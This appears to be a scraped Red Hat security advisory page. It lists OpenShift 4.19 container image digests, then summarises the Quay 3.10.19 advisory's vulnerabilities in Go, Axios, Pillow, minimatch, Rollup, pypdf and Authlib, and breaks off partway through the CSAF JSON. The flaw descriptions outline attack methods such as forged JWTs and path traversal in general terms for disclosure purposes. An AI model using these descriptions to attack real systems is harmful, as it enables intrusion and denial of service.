"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "koa: Koa: Host header injection vulnerability due to malformed HTTP Host header parsing"
}
]
}
RHSA-2026:5665
Vulnerability from csaf_redhat - Published: 2026-03-24 18:02 - Updated: 2026-04-16 11:09A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.
A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.
A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor > 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.
A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.
A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.
A flaw was found in pypdf. Processing a specially crafted PDF document, specifically with circular /Prev references in the cross-reference (xref) chain, can cause an infinite loop and a high consumption of CPU, resulting in a denial of service.
A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).
A flaw was found in Authlib, a Python library used for creating secure authentication and authorization systems. This vulnerability, known as JWK (JSON Web Key) Header Injection, affects how Authlib verifies digital signatures in JWS (JSON Web Signature) tokens. An attacker can exploit this by creating a specially crafted token that includes their own cryptographic key in the header. When the system attempts to verify this token without a predefined key, it mistakenly uses the attacker's key, allowing them to bypass authentication and gain unauthorized access.
A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a "none" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Quay 3.10.19 is now available with bug fixes.",
"title": "Topic"
},
{
"category": "general",
"text": "Quay 3.10.19",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:5665",
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61728",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68121",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
